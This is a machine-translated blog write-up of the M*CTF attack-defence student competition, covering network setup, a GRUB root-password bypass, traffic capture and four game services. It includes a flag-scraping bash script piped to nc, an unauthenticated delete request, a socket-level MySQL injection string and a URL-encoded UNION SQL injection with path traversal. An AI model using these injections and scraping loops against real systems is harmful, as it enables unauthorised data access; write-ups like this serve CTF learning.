Notes M*CTF

mctf


Good day! In this little opus, I would like the eyes of the participants to tell how the competition CTF type of attack-defence and, in particular, to cover the last competition m*ctf. But before all this I would like to thank your University Innopolis for the opportunity to visit this (and many other) events.


Under the cut both organizational and technical details of past competitions. And of course lots and lots of pictures!


CTF


guest-team


CTF is a team competition in computer security and are divided into two types.


the First (jeopardy or task-based) — independent tasks of different nature. As a rule emit basic categories: cryptography, steganography, reverse, forensic, admin. Who will score more points in the allotted time — and that fellow (recent events example — CTF from Bi.Zone)


the Second type (he is attack-defence) — a much more interesting and rare event. Each team is given a vulnerable way (all teams it is identical), which contains several services. Each of these services in any way works with strings, which are called flags. As the name implies, the participants are required to drag them through vulnerabilities in services. And in addition to this and to protect their own. A similar competition was M*CTF.


M*CTF


people


M*CTF is a competition for students of Moscow Universities, which are held for the 3 time, this time on the basis of MTUCI. By happy coincidence, I managed to get at team and enjoy the competition.


Day of lectures


the First day was marred by an early rise (though the second is not much different). This day was a registration of the teams and, most importantly, lectures (by the way, open to all) from partners. And serious the situation, the organizers tried to dispel a little competition. The lecture program looked like this:


lectures


Thanks to ptsecurity, Infotecs, Group IB and presenters from other organizations.


the day of the competition


Network


Before the competition we were given the configs of the grid for the team with the number N (mine was 21, then it will be used):


the
    the
  • Mesh: 10.60.N.1/24
    • the
  • Gateway: 10.60.N.1
    • the
  • Services should be available: 10.60.N.2
    • the
  • Available for other teams IP: 10.60.N.0/25
    • the
  • not available for other teams IP: 10.60.N.128/25
    • the
  • Host to check flags: 10.10.40.2:8080

Then began the most interesting — we started giving away USB drive with images. Ironically, about 90% of flash drives contain broken files, so later the image was posted on gapdoc. CTF wouldn't be CTF-Ohm, if they had not seen such incidents.


facepalm


since I played almost one to delegate tasks there was no one, therefore, all actions below should be performed in parallel by different team members. Then there is a very small chance that you still have time :)


First steps



the First thing is to do is of course to get in the way and see what lies there. But, alas, to me it got very late, so the first preparations were associated with the mesh. Nothing magical or hard about it, but the problem arises when you need to "here, now, and that worked", and mana under a thick layer of dust has long been forgotten.


the 
ip a a 10.60.21.135/24 dev eth0
ip r a default via 10.60.21.1 dev eth0

on the whole, the main thing not to forget to turn off the dhcp client (or make your own) to not reset settings. And, of course, is to register ns-server to a human being to go to the Internet:


what cost to start


After some time came to me the cherished image of the mctf.ova and I happily opened it in virtual reality. Subjects were 64-bit Debian, eager only 1 GB RAM. The first flank appears the blue screen with GRUB-om:


grub


the Passwords of users in this case did not specify, but, fortunately, we have the usual grub, so we easily can change the loader record. After the download, change password for root and reboot, not forgetting to first add the starting /bin/bash


grub-bash


Then it makes sense to set network adapter type to Bridged, and configure the network inside the image.


in General, it is worth noting that a little complicate your life and honestly make a NAT adapter with the proper forwarding and filtering, and even cheat on the proxy gateway and some IDF, but in fact it is rarely necessary.


Inside the image grid is configured for 4 teams, so it should be correct:


the 
ip a f dev eth0
ip a a 10.60.21.2/24 dev eth0
ip r a default via 10.60.21.1 dev eth0

And a little more about the network


Before moving on to the most interesting, it is worth mentioning the wonderful opportunity of finding a vulnerability analysis of the network traffic with wireshark or any other known tool. As you probably know you can monitor the traffic that comes to you and there will likely be requests from the organizers and from rivals.


I lasted about 4 episodes dumps (~3GB), but, alas, one of them was permanently lost due to unscheduled reboot (hope there accidentally flushed passwords :). Personally, I prefer to run the GUI and periodically look back, although you can do like this team, if you feel sorry for the memory:


the 
tshark -i eth0 -w traf1.pcap

Perhaps the cost to automate the process of creating new files, but that it was necessary to think in advance. In the course of the game is usually not up to it.


another-team


in Addition to finding vulnerabilities in traffic you can still analyze packets of the organizers (at the beginning of the game, usually there is a main traffic). Here, for example, you can define User-Agent organizers and thus, it is possible to filter packets from other players. Here you can define the format of the flag and on what ports and what Protocol it arrives.


Looking at images


And finally the most interesting! Services we were only 4 pieces and they revolve in containers Docker. View information about available images and spinning of the containers is possible for example so:


the 
docker ps && docker images

docker


Here we can see 4 of the service: voicemail(2222 port in the list it won't be displayed), drdre (port 3333), mis(8080 port) poke(port 8090).


to perform a service, we need to go to the Docker container and then find and download the necessary files.


the 
docker exec -it mctf-<service> /bin/bash

a Small note before the review: the review of the problems after the competition was not further description of the services is what I managed to dig up for those 8 hours that could learn in the process of communication with other teams after the game. So each of the services is likely to still have (a lot!) exploited vulnerabilities, so I'd be grateful for additions.


Voicemail

voicemail


the First service is used to send voice messages using the SIP - based library of freeswitch and all low-level things happen there. The library has enough fresh and free beneath her ready exploits there, so studying it seemed like a waste of time.


More interestingly, the already mentioned library creates /var/www/voicemail/static/freeswitch.log that is not handled separately in the voicemail.py. Why is it important? This log needs to get the flags (in the words of other participants), although the dumps of traffic and service requests from other teams and I have not been able to find.


DrDre

drdre


the Second service is a monster (although useful files there, not so much) Tomcat-server. It acts as a site anti-virus company. With it you can download Dr. Dre antivirus or check malware similar to virustotal. Most likely after you submit this file run antivirus, with which you can get some of the ill-fated RCE.


It actually was one of these services, the vulnerability which I discovered in the traffic. The request went to http://10.60.21.2:3333/stat?debug=true, without thinking, go there and see (or don't see, you don't have flags :) the string looks suspiciously like a flag. A small script to pass the flags could look for example like this:


the 
#!/bin/bash

for i in $(seq 1 20);
do
wget-q "http://10.60.$i.2:3333/stat?debug=true" -O file --timeout=2

for i in $(egrep -o "[a-zA-Z0-9]{40}=", file); 
do
echo $i | nc 10.10.40.2 8080 | grep-i "input flag"
sleep 1
done
done

MIS (aka Private Messanger)

mis


the Third service is a php server with low-level communication with the database through the bare sockets. It allows you to encrypt text using pictures 100х100рх. The key goes from low-order bits of the R channel, the total comes to key can be up to 10,000 bits. The ciphertext comes with the exclusive or between the flag, known in advance the salt and key. Tried to watch examples of keys, but, alas, look like they were generated randomly. Although one unconfirmed and not denied guess was all the same: it is likely that the keys could be used for all commands the same. Then with the knowledge of salts and the key was to get the flag.


the First attack was the type of DoS is performed and it is very simple. When prompted to delete messages (flag) was tested only the password, not its correctness. Total request GET /delete.php?id=<id>&pass=0&ask=Y you could remove the flags of your opponent and thereby force him to lose valuable points.


the Second attack was to inject queries to mysql via bare sockets. Request in the service were as follows: P\t999\tservice1\ttext\tPRIMARY\tid,pass,text\n999\t=\t1\t$_GET[id]\n, thus to pick up the line and get full access to the database.


Poke

poke


the service also is implemented in php. It asks the user to choose a pokemon and roam the map in search of battles. After a certain number of victories goes the flag. This service apparently was the most leaky of all. In fact, fighting can be carried out without encountering the opponent, you just know his nickname. One of the vulnerabilities is trivial sqli wherever possible.


For example, the query: /battle.php?to=qzqzqqz'%20union%20select%20username%20from
the %20users%20limit%2012345,1%20--%201 will display the user name at number 12345. Further, at the request of "/class/database/users/<nick>/flag.jpg" get the flags. You could do something even simpler: request "/class/database/users.db" gave a whole sqlite database, where in addition to the list of users to get more hashes of passwords and many other interesting places. But if you just want to play with someone, you can just go to /battle.php?to=../users/


a few words about the end


cup


an hour before the end of the competition (deliberately) closed the access to the table with the glasses, and thus, the intrigue was there who is still going to win. Was extremely unexpected to see the first place team from the HSE, which took 2nd place. And end skorbord the hacker, konsolki (and not because you crashed the server):


I would like to Express my gratitude to the community ctfnews for supporting the competitions and for photos. Rest of the way, can be found in album VK

Article based on information from habrahabr.ru

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

Automatically create Liquibase migrations for PostgreSQL

Изображение
Working with Liquibase always brings confidence in the fact that the database objects are in the same condition in which you want it. It is this confidence and makes system migrations so popular databases. Today I want to tell you how to make using liquibase a bit easier. If you write a migration by hand, and your target database is PostgreSQL, then read this article, I am sure, the time spent on reading the article will be repaid with interest. I hope you already know how to work with Liquibase, so only two words describe how the system works. In order to make changes in the database, you need to create a migration file (changeset) that you need to specify in the file change log (changelog), after which the migration can be successfully applied to the target database. Undeniable and obvious benefit of this approach is the ability to rollback the changes. In my opinion, liquibase, there is only one drawback — the automatic rollback of changes only works only if the mi...
Далее...

Looking for books as you want

Изображение
this last week or two, as curious users can watch Russian search service on books from Google . However, the General public before the official announcement from Google itself remains in the dark. Meanwhile, already there is something to see and something to tell. Besides, Google has not gone unnoticed in Yandex, which last week began offering users with Store cards and the output presented there books. What, in turn, did not fail to say publicly. Let's take a closer look at what is offered book lovers the giants of the search. Let's start with Google. The California company offers us their traditional approach. Typing in the familiar search bar the title of the book, we get... well, what we will get, greatly depends on many factors. Mostly while where a book has been published. If it's a popular publication in the United States (as an example from reference service — exposing the social ills of America's best-selling book " Fast Food Nation "), the...
Далее...

Vkontakte sync with address book for iPhone. How it was done

Изображение
the Background application on androidphone when you install the application Vkontakte is possible to use it as a provider of contacts to synchronize the contacts from Facebook with contacts in your address book. In this case stretches the avatar, date of birth, address, phone numbers, etc. When I after prolonged use HTC Wildfire S rated and are so used to this that he wanted to find a similar to the iPhone. Not found, so we took it and made his own — Synchronizer VKontakte :) It was back in November of last year. The application was done fairly quickly — it uses quite a few functions of Vkontakte API and functionality with the address book of the iPhone. But when we started to deal with the automatic matching of contacts, it was fun. Compare head-on by name, last name and phone number was easy to do, easy, and worked through it quickly. But found only 20 percent of coincidences of the contacts from what is provider in Android. Of course, only direct hits do not sui...
Далее...